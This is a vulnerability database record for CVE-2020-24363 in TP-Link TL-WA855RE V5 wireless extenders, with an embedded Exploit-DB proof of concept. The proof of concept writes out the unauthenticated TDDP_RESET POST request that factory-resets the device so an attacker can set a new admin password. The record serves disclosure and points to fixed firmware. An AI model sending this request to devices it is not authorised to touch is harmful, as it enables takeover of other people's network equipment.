ID CVE-2020-24363
Type cve
Reporter cve@mitre.org
Modified 2020-09-08T17:41:00
Description
TP-Link TL-WA855RE V5 20200415-rel37464 devices allow an unauthenticated attacker (on the same network) to submit a TDDP_RESET POST request for a factory reset and reboot. The attacker can then obtain incorrect access control by setting a new administrative password.
{
  "exploitdb": [
    {
      "lastseen": "2020-11-23T12:24:22",
      "description": "",
      "published": "2020-11-23T00:00:00",
      "type": "exploitdb",
      "title": "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass",
      "bulletinFamily": "exploit",
      "cvelist": ["CVE-2020-24363"],
      "modified": "2020-11-23T00:00:00",
      "id": "EDB-ID:49092",
      "href": "https://www.exploit-db.com/exploits/49092",
      "sourceData": "# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass\r\n# Date: 2020/07/29\r\n# Exploit Author: malwrforensics\r\n# Vendor Homepage: https://tp-link.com\r\n# Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip\r\n# Version: TL-WA855RE(US)_V5_200415\r\n# Tested on: N/A\r\n# CVE : 2020-24363 \r\nImportant: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware\r\n\r\nDetails\r\nBy default the web interface of the TL-WA855RE wireless extender require users to log in in order to access the admin interface. However, an attacker, on the same network, can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device.\r\nTo test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password.\r\n\r\nPOST /?code=5&asyn=0 HTTP/1.1\r\nHost: <redacted>\r\nContent-Length: 7\r\nAccept: text/plain, */*; q=0.01\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0\r\nContent-Type: text/plain;charset=UTF-8\r\nOrigin: http://<redacted>\r\nReferer: http://<redacted>\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n0|1,0,0",
      "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"},
      "sourceHref": "https://www.exploit-db.com/download/49092"
    }
  ]
}